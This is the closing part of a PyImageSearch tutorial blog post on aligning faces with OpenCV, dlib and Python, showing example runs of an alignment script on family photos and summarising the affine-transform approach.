From there you’ll see the following input image, a photo of myself and my financée, Trisha:

Figure 3: An input image to our OpenCV face aligner.

This image contains two faces, therefore we’ll be performing two facial alignments.

The first is seen below:

Figure 4: Aligning faces with OpenCV.

On the left we have the original detected face. The aligned face is then displayed on the right.

Now for Trisha’s face:

Figure 5: Facial alignment with OpenCV and Python.

Notice how after facial alignment both of our faces are the same scale and the eyes appear in the same output (x, y)-coordinates.

Let’s try a second example:

$ python align_faces.py \
        --shape-predictor shape_predictor_68_face_landmarks.dat \
        --image images/example_02.jpg

Here I am enjoying a glass of wine on Thanksgiving morning:

Figure 6: An input image to our face aligner.

After detecting my face, it is then aligned as the following figure demonstrates:

Figure 7: Using facial landmarks to align faces in images.

Here is a third example, this one of myself and my father last spring after cooking up a batch of soft shell crabs:

$ python align_faces.py \
        --shape-predictor shape_predictor_68_face_landmarks.dat \
        --image images/example_03.jpg

Figure 8: Another example input to our face aligner.

My father’s face is first aligned:

Figure 9: Applying facial alignment using OpenCV and Python.

Followed by my own:

Figure 10: Using face alignment to obtain canonical representations of faces.

The fourth example is a photo of my grandparents the last time they visited North Carolina:

$ python align_faces.py \
        --shape-predictor shape_predictor_68_face_landmarks.dat \
        --image images/example_04.jpg

Figure 11: Inputting an image to our face alignment algorithm.

My grandmother’s face is aligned first:

Figure 12: Performing face alignment using computer vision.

And then my grandfather’s:

Figure 13: Face alignment in unaffected by the person in the photo wearing glasses.

Despite both of them wearing glasses the faces are correctly aligned.

Let’s do one final example:

$ python align_faces.py \
        --shape-predictor shape_predictor_68_face_landmarks.dat \
        --image images/example_05.jpg

Figure 14: The final example input image to our face aligner.

After applying face detection, Trisha’s face is aligned first:

Figure 15: Facial alignment using facial landmarks.

And then my own:

Figure 16: Face alignment still works even if the input face is rotated.

The rotation angle of my face is detected and corrected, followed by being scaled to the appropriate size.

To demonstrate that this face alignment method does indeed (1) center the face, (2) rotate the face such that the eyes lie along a horizontal line, and (3) scale the faces such that they are approximately identical in size, I’ve put together a GIF animation that you can see below:

Figure 17: An animation demonstrating face alignment across multiple images.

As you can see, the eye locations and face sizes are near identical for every input image.

Summary

In today’s post, we learned how to apply facial alignment with OpenCV and Python. Facial alignment is a normalization technique, often used to improve the accuracy of face recognition algorithms, including deep learning models.

The goal of facial alignment is to transform an input coordinate space to output coordinate space, such that all faces across an entire dataset should:

1. Be centered in the image.
2. Be rotated that such the eyes lie on a horizontal line (i.e., the face is rotated such that the eyes lie along the same y-coordinates).
3. Be scaled such that the size of the faces are approximately identical.

All three goals can be accomplished using an affine transformation. The trick is determining the components of the transformation matrix,

M

 .

Our facial alignment algorithm hinges on knowing the (x, y)-coordinates of the eyes. In this blog post we used dlib, but you can use other facial landmark libraries as well — the same techniques apply.

Facial landmarks tend to work better than Haar cascades or HOG detectors for facial alignment since we obtain a more precise estimation to eye location (rather than just a bounding box).

If you’re interested in learning more about face recognition and object detection, be sure to take a look at the PyImageSearch Gurus course where I have over 25+ lessons on these topics.

Downloads:

If you would like to download the code and images used in this post, please enter your email address in the form below. Not only will you get a .zip of the code, I’ll also send you a FREE 11-page Resource Guide on Computer Vision and Image Search Engines, including exclusive techniques that I don’t post on this blog! Sound good? If so, enter your email address and I’ll send you the code immediately!

Email address:

The post Face Alignment with OpenCV and Python appeared first on PyImageSearch.

from PyImageSearch http://ift.tt/2r976Ix
via IFTTT